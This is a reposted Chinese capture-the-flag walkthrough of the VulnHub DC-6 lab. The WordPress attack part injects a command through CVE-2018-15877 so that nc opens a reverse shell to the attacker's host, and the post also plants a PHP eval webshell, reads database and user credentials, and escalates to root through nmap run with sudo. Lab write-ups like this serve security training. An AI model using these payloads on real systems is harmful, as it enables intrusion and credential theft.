DC-6 靶场通关小记

news/2025/1/10 0:39:14/文章来源:https://www.cnblogs.com/lrui1/p/18660145

地址 https://www.vulnhub.com/entry/dc-6,315/

环境配置

略，有问题可参考 https://www.cnblogs.com/lrui1/p/18655388

需要向hosts文件添加以下内容

Windows：C:\Windows\System32\drivers\etc\hosts

Linux：/etc/hosts

192.168.x.x wordy

作者给的提示

Clue
OK, this isn't really a clue as such, but more of some "we don't want to spend five years waiting for a certain process to finish" kind of advice for those who just want to get on with the job.

cat /usr/share/wordlists/rockyou.txt | grep k01 > passwords.txt

That should save you a few years. 😉

爆破时的字典弄小点

主机发现

fscan扫描存活主机

fscan.exe -h 192.168.74.0/24 -nobr -nopoc
start infoscan
(icmp) Target 192.168.74.2    is alive
(icmp) Target 192.168.74.129  is alive
(icmp) Target 192.168.74.128  is alive
(icmp) Target 192.168.74.131  is alive
[*] Icmp alive hosts len is: 4
192.168.74.129:445 open
192.168.74.129:139 open
192.168.74.129:135 open
192.168.74.131:80 open
192.168.74.131:22 open
192.168.74.129:20000 open
[*] alive ports len is: 6
start vulscan
[*] NetInfo
[*]192.168.74.129[->]DESKTOP-UOBBQ0U[->]192.168.74.129
[*] WebTitle http://192.168.74.131     code:301 len:0      title:None 跳转url: http://wordy/
已完成 6/6

rustscan快速扫描端口并指纹识别

./rustscan -a 192.168.74.131 -- -A -sC
Open 192.168.74.131:22
Open 192.168.74.131:80
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 7.4p1 Debian 10+deb9u6 (protocol 2.0)
| ssh-hostkey: 
|   2048 3e:52:ce:ce:01:b6:94:eb:7b:03:7d:be:08:7f:5f:fd (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDDHiBBFUtpw1T9DZyoXpMp3kg25/RgmGZRFFmZuTfV9SJPxJCvrQXdM6P5GfFLFcgnLlcOBhBbv33N9HvWisycRypK0uLK26bntqfyTAFCdMXcud7fKNgRBxJdN8onwl4Hly3wzRBJxFWqTdD1RF8viYH4TYIs5+WLpN7KihosjpbwzPpOnbDQZUw7GdHvosV7dFI6IMcF57R4G5LzSgV66GACNGxRn72ypwfOMaVbsoxzCHQCJBvd8ULL0YeAFtNeHoyJ8tL3dZlu71Wt9ePYf7ZreO+en701iDqL6T/iyt3wwTDl7NwpZGj5+GrlyfRSFoNyHqdd0xjPmXyoHynp
|   256 3c:83:65:71:dd:73:d7:23:f8:83:0d:e3:46:bc:b5:6f (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBE+jke+7np4l7EWf0wgySSp3MtYFcI6klVOWm7tDjas8eDxc9jYOhR4uK7koa2CkQPDd18XJSt0yNAGQFBb7wzI=
|   256 41:89:9e:85:ae:30:5b:e0:8f:a4:68:71:06:b4:15:ee (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAII1mnJveN8yJySEDhG8wjYqtSKmcYNdX5EVqzxYb92dP
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.25 ((Debian))
|_http-title: Did not follow redirect to http://wordy/
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.25 (Debian)

目标机 192.168.74.131，目标端口22,80

信息收集

dirsearch目录扫描

python dirsearch.py -u http://wordy/
[13:59:12] 200 -    7KB - /license.txt
[13:59:36] 200 -    3KB - /readme.html
[13:59:55] 200 -  517B  - /wp-admin/install.php
[13:59:55] 200 -    0B  - /wp-config.php
[13:59:55] 200 -    0B  - /wp-content/
[13:59:55] 200 -    0B  - /wp-cron.php
[13:59:55] 200 -    1KB - /wp-login.php
[13:59:55] 200 -    4KB - /wp-includes/

cmseek CMS识别，快速收集信息

python cmseek.py -u http://wordy/[+]  Deep Scan Results  [+]┏━Target: wordy┃┠── CMS: WordPress┃    │┃    ├── Version: 5.1.1┃    ╰── URL: https://wordpress.org┃┠──[WordPress Deepscan]┃    │┃    ├── Readme file found: http://wordy//readme.html┃    ├── License file: http://wordy//license.txt┃    │┃    ├── Themes Enumerated: 1┃    │    │┃    │    ╰── Theme: twentyseventeen┃    │        │┃    │        ├── Version: 5.1.1┃    │        ╰── URL: http://wordy//wp-content/themes/twentyseventeen┃    │┃    │┃    ├── Usernames harvested: 5┃    │    │┃    │    ├── graham┃    │    ├── admin┃    │    ├── jens┃    │    ├── sarah┃    │    ╰── mark┃    │┃┠── Result: C:\Users\test\Desktop\tools\web\CMSeeK-v.1.1.3\Result\wordy\cms.json┃┗━Scan Completed in 7.93 Seconds, using 45 Requests

访问http://wordy/wp-login.php，fuzz账号密码

成功获取账号

mark/helpdesk01

分析左边导航栏，发现plainview_activity_monitor模块，尝试利用历史漏洞

利用 CVE-2018-15877

验证漏洞存在，前端输入有长度限制，抓包后fuzz的反弹shell payload如下

ncat -lvnp 4444
127.0.0.1 | nc -c /bin/bash 192.168.74.129 4444

提权—尝试获取jens密码(失败)

搞个Webshell，好传文件

cd /var/www/html
echo '<?php @eval($_REQUEST["shell"])?>' > 1.php

cat /etc/passwd，搜集其他账号

访问/home/mark/stuff/things-to-do.txt内容如下

Things to do:- Restore full functionality for the hyperdrive (need to speak to Jens)
- Buy present for Sarah's farewell party
- Add new user: graham - GSo7isUM1D4 - done
- Apply for the OSCP course
- Buy new laptop for Sarah's replacement

获得新的账号

graham/GSo7isUM1D4

SSH登录后，尝试常规提权流程

sudo -l
Matching Defaults entries for graham on dc-6:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser graham may run the following commands on dc-6:(jens) NOPASSWD: /home/jens/backups.shfind / -perm -u=s -type f 2>/dev/null
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/lib/eject/dmcrypt-get-device
/usr/bin/chfn
/usr/bin/sudo
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/passwd
/bin/su
/bin/mount
/bin/umount
/bin/ping

需要jens用户的账号密码，读取/var/www/html/wp-config.php获取数据库账号密码，连接数据库

/** MySQL database username */
define( 'DB_USER', 'wpdbuser' );/** MySQL database password */
define( 'DB_PASSWORD', 'meErKatZ' );

使用frp 搭建内网穿透服务，随后使用本机的Navicat浏览数据库

frp实现内网穿透，Navicat用IP访问会报错，localhost正常连接

查看 wp_users 表的内容

jens
$P$B//75HFVPBwqsUTvkBcHA8i4DUJ7Ru0
1556111080:$P$B5/.DwEMzMFh3bvoGjPgnFO0Qtd3p./

使用john爆破该Hash(之前筛选出的字典)

john --rules --wordlist=/usr/share/wordlists/rockyou.txt pass.txt

好吧，没爆出来

提权

使用jens身份执行

sudo -u jens ./backups.sh

编辑backup.sh为以下内容

#!/bin/bash
# tar -czf backups.tar.gz /var/www/html
sudo -l

得到以下输出

Matching Defaults entries for jens on dc-6:env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/binUser jens may run the following commands on dc-6:(root) NOPASSWD: /usr/bin/nmap

使用 jens 的身份可以使用root权限无密码运行 /usr/bin/nmap 文件

编辑backup.sh为以下内容

#!/bin/bash
# tar -czf backups.tar.gz /var/www/html
sudo -l
sudo nmap --script=/tmp/hack.nse

vi /tmp/hack.nse

os.execute('/bin/bash')

sudo -u jens ./backups.sh

获取root权限

参考链接

谈一谈Linux与suid提权

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：http://www.hqwc.cn/news/865960.html

如若内容造成侵权/违法违规/事实不符，请联系编程知识网进行投诉反馈email:809451989@qq.com，一经查实，立即删除！

【Java编程】一个高性能、支持百万级多任务重试框架：Fast-Retry

前言假设你的系统里有100万个用户，然后你要轮询重试的获取每个用户的身份信息, 如果你还在使用SpringRetry和GuavaRetry 之类的这种单任务的同步重试框架，那你可能到猴年马月也处理不完，即使加再多的机器和线程也是杯水车薪，而Fast-Retry正是为这种场景而生。 Fast-Retry …

1 首先要安装brew 2 git clone https://git.ffmpeg.org/ffmpeg.git ffmpeg 3 cd ffmpeg 4 执行脚本 ./configure --prefix=/opt/local 5 编译 sudo make ，需要提权，要不系统目录无法创建文件夹 6 安装 make install 7 安装成功，查看 ffmpeg版本 /opt/local/bin/ffmpeg -ve…

如何在 LobeChat 中使用 Ollama

本文介绍了如何在LobeChat中使用Ollama框架运行本地大型语言模型。文章详细说明了在macOS、Windows和Linux操作系统下安装和配置Ollama的步骤，并指导用户如何通过Docker容器部署Ollama。此外，文章还介绍了如何在LobeChat中安装和选择Ollama模型进行对话。Ollama 是一款强大的…

密码综合实战

这种加密本质上是换汤不换药的，我们需要有所创新，下面是我的想法(key{A}和key{B}表示的是A和B独有的秘钥)：假设现在有服务器192.168.1.1，本机扮演角色A，服务器扮演角色B，进行如下逻辑：A拥有A的专属秘钥（汉字秘钥）进行一次加密发送给B，B接受到后再用B的专属秘钥再次加…

FrontEnd性能优化.md

性能优化性能优化\浏览器渲染原理 Get Started有这样几个问题，我们来思考下：1.我们平常浏览的网页是否是应用?2.在操作系统中的应用是如何运行的3.浏览器究竟是什么4.webkit和浏览器的关系5.浏览器是如何呈现网页的6.经典问题：从浏览器的地址栏输入一个网址直到网页内容呈…

Tita OKR 应用技巧：OKR 评分

OKR 评分价值 OKR（目标与关键成果）评分主要有以下几方面价值：一、目标管理方面明确目标完成程度OKR评分可以直观地展现目标的达成情况。例如，一个产品团队设定了提升用户满意度的目标，通过OKR评分，可以清楚地看到用户满意度指标从初始的60%提升到了75%还是80%等具体数值…

ArmSoM RK3588/RK3576核心板，Rockchip Display 使用

1. Display简介 RK3588 的VOP (video output process)分为4个Port:port分辨率VP0 4KVP1 4KVP2 4KVP3 1080PRK3588 VP 和各显⽰接口的连接关系：需要注意的是，RK3588 的 HDMI 和 DP ⽀持 8K 输出，但是在 8K 输出模式下，⼀个显⽰接口需要同时占⽤ VP0 和 VP1 。所以如果产…

JNI接口--实现Java调用C++

1、JNI原理概述通常为了更加灵活高效地实现计算逻辑，我们一般使用C/C++实现，编译为动态库，并为其设置C接口和C++接口。用C++实现的一个库其实是一个或多个类的简单编译链产物，然后暴露其实现类的构造方法和纯虚接口类。这样就可以通过多态调用到库内部的实现类及其成员方法…

Leaflet 实现离线瓦片资源 + 飞线迁徙 + 自定义标记点位实现

npm install leaflet 注意构建webpack配置module: {rules: [{test: /\.(png|jpg|gif|jpeg|svg)$/,include: /node_modules[\\/]leaflet/,use: [{loader: url-loader,options: {outputPath: static/images}}]}] } 注意外部资源代理方式proxy: {/cdn: {target: https:// + ip + :…

Training Transformers with 4-bit Integers

目录概符号说明4-bit FQTLearned Step Size QuantizationHadamard QuantizationBit Splitting and Leverage Score Sampling代码Xi H., Li C., Chen J. and Zhu J. Training transformers with 4-bit integers. NeurIPS, 2023.概本文针对 4-bit 中训练中一些特点 (针对 transf…

python SQLAlchemy ORM——从零开始学习 02简单的增删查改

02 简单的增删查改前情提要：承接了01中的engine以及User类 2-1 了解会话机制个人理解在SQLAlchemy 增删查改中是依赖会话（Session）这个机制进行操作的，我个人的理解是用“会话“进行连接数据库周期的一系列管理操作（以下是ai生成对此会话的理解）ai理解在 SQLAlchemy 中…

DC-6 靶场通关小记

环境配置

主机发现

信息收集

利用 CVE-2018-15877

提权—尝试获取jens密码(失败)

提权

参考链接

相关文章

MuMu模拟器连接Android Studio

【Java编程】一个高性能、支持百万级多任务重试框架：Fast-Retry

mac m1 安装ffmpeg，配置环境变量

如何在 LobeChat 中使用 Ollama

密码综合实战

FrontEnd性能优化.md

Tita OKR 应用技巧：OKR 评分

ArmSoM RK3588/RK3576核心板，Rockchip Display 使用

JNI接口--实现Java调用C++

Leaflet 实现离线瓦片资源 + 飞线迁徙 + 自定义标记点位实现

Training Transformers with 4-bit Integers

python SQLAlchemy ORM——从零开始学习 02简单的增删查改